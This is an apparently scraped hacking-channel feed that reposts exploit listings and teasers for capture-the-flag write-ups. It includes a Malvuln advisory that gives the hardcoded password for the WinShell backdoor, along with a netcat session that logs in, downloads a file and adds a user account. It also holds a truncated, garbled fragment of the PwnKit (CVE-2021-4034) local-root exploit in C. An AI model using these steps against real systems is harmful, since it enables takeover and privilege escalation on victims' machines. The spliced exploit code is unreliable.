Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.WinShell.50 Weak Hardcoded Password
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Backdoor.Win32.WinShell.50 malware suffers from a weak hardcoded password vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.WinShell.50 Weak Hardcoded Password
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Backdoor.Win32.WinShell.50 malware suffers from a weak hardcoded password vulnerability.
MD5 |
bef88d27106d91a30aaca122335166ecDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/1fd45364073a81ddd707d74ba5d4c121.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.WinShell.50
Vulnerability: Weak Hardcoded Password
Description: The malware listens on TCP port 85 and requires authentication. However, the password "imdabest" is weak, hardcoded in plaintext in the PE file and appears many times in a database of leaked passwords.
Type: PE32
MD5: 1fd45364073a81ddd707d74ba5d4c121
Vuln ID: MVID-2022-0474
Dropped files: "sxe32A3.tmp"
Disclosure: 01/25/2022
Exploit/PoC:
nc64.exe x.x.x.x 85
:imdabest
WinShell v5.0 (C)2002 janker.org
? for help
CMD>?
i Install
r Remove
p Path
b reBoot
d shutDown
s Shell
x eXit
q Quit
Download:
CMD>http://.../srv.exe
? for help
CMD>s
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.
c:\dump>whoami
whoami
desktop-2c3kqho\victim
c:\dump>net user hyp3rlinx 666 /add
net user hyp3rlinx 666 /add
The command completed successfully.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.WinShell.50 Weak Hardcoded Password
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Polkit pkexec CVE-2021-4034 Local Root
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034 and known as PwnKit. Written in Go.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Polkit pkexec CVE-2021-4034 Local Root
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034 and known as PwnKit. Written in Go.
MD5 |
271a8e6ede6ade0c32c81eb6c9a1ab8fDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit pkexec CVE-2021-4034 Local Root
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Polkit pkexec CVE-2021-4034 Proof Of Concept
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034. Verified on Debian 10 and CentOS 7. Written in C.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Polkit pkexec CVE-2021-4034 Proof Of Concept
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034. Verified on Debian 10 and CentOS 7. Written in C.
MD5 |
962194925e2d2e27879a466979773a6eDownload
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit pkexec CVE-2021-4034 Proof Of Concept
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Heading to Miami Hack Week 2022? Don’t Forget These 3 Networking Tricks
https://cdn-images-1.medium.com/max/1080/0*BuFiRu3ucqNRuIn_.png
Miami Hack Week brings together the brightest and best engineers from around the world for a unique hackathon. This guide will give you a…
Continue reading on HiHello »
___________________________
@hacking_Attack
@Hacking_Video
Heading to Miami Hack Week 2022? Don’t Forget These 3 Networking Tricks
https://cdn-images-1.medium.com/max/1080/0*BuFiRu3ucqNRuIn_.png
Miami Hack Week brings together the brightest and best engineers from around the world for a unique hackathon. This guide will give you a…
Continue reading on HiHello »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Heading to Miami Hack Week 2022? Don’t Forget These 3 Networking Tricks
Miami Hack Week brings together the brightest and best engineers from around the world for a unique hackathon. This guide will give you a…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A 12-year-old Polkit vulnerability enables unauthorized Linux users to get admin rights
https://cdn-images-1.medium.com/max/820/1*EbRcIwOPHjsur6dYeWsORg.png
An old security issue in a system utility named Polkit has been exposed, granting intruders admin rights on Linux computers, even as a…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
A 12-year-old Polkit vulnerability enables unauthorized Linux users to get admin rights
https://cdn-images-1.medium.com/max/820/1*EbRcIwOPHjsur6dYeWsORg.png
An old security issue in a system utility named Polkit has been exposed, granting intruders admin rights on Linux computers, even as a…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
A 12-year-old Polkit vulnerability enables unauthorized Linux users to get admin rights
An old security issue in a system utility named Polkit has been exposed, granting intruders admin rights on Linux computers, even as a…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe: Daily Bugle (OSCP approved tools)
https://cdn-images-1.medium.com/max/1145/1*x5hsVtACxKyFmVOB3yQOZg.png
This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe: Daily Bugle (OSCP approved tools)
https://cdn-images-1.medium.com/max/1145/1*x5hsVtACxKyFmVOB3yQOZg.png
This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe: Daily Bugle (OSCP approved tools)
This Hard TryHackMe room is a Content Management System using Joomla. The Joomla instance is vulnerable to a public exploit. We then crack…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Pikaboo
https://cdn-images-1.medium.com/max/720/0*BI3VRD78vnARR40t.png
As always, we start with nmap to discover open ports/services.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Pikaboo
https://cdn-images-1.medium.com/max/720/0*BI3VRD78vnARR40t.png
As always, we start with nmap to discover open ports/services.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Pikaboo
As always, we start with nmap to discover open ports/services.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
UnWordle
https://cdn-images-1.medium.com/max/600/1*5draOF8Brekd9UqNO8Uq5w.png
How I hacked into the popular word game.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
UnWordle
https://cdn-images-1.medium.com/max/600/1*5draOF8Brekd9UqNO8Uq5w.png
How I hacked into the popular word game.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
UnWordle
How I hacked into the popular word game.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HTB: Node Writeup w/o Metasploit
https://cdn-images-1.medium.com/max/600/0*Hj-62WbgyuzZqL_s.png
Introduction
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
HTB: Node Writeup w/o Metasploit
https://cdn-images-1.medium.com/max/600/0*Hj-62WbgyuzZqL_s.png
Introduction
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HTB: Node Writeup w/o Metasploit
Introduction
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Forge
https://cdn-images-1.medium.com/max/1050/0*22hQiMej9HQoTz9c.png
As always we start with nmap to discover open ports.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Forge
https://cdn-images-1.medium.com/max/1050/0*22hQiMej9HQoTz9c.png
As always we start with nmap to discover open ports.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Forge
As always we start with nmap to discover open ports.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Agente de acceso inicial involucrado en ataques de Log4Shell contra servidores VMware Horizon
https://cdn-images-1.medium.com/max/1527/0*skQbv2gP2cH_cPWO
PUBLICADO EN 26 ENERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Agente de acceso inicial involucrado en ataques de Log4Shell contra servidores VMware Horizon
https://cdn-images-1.medium.com/max/1527/0*skQbv2gP2cH_cPWO
PUBLICADO EN 26 ENERO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Agente de acceso inicial involucrado en ataques de Log4Shell contra servidores VMware Horizon
PUBLICADO EN 26 ENERO, 2022POR EHACKING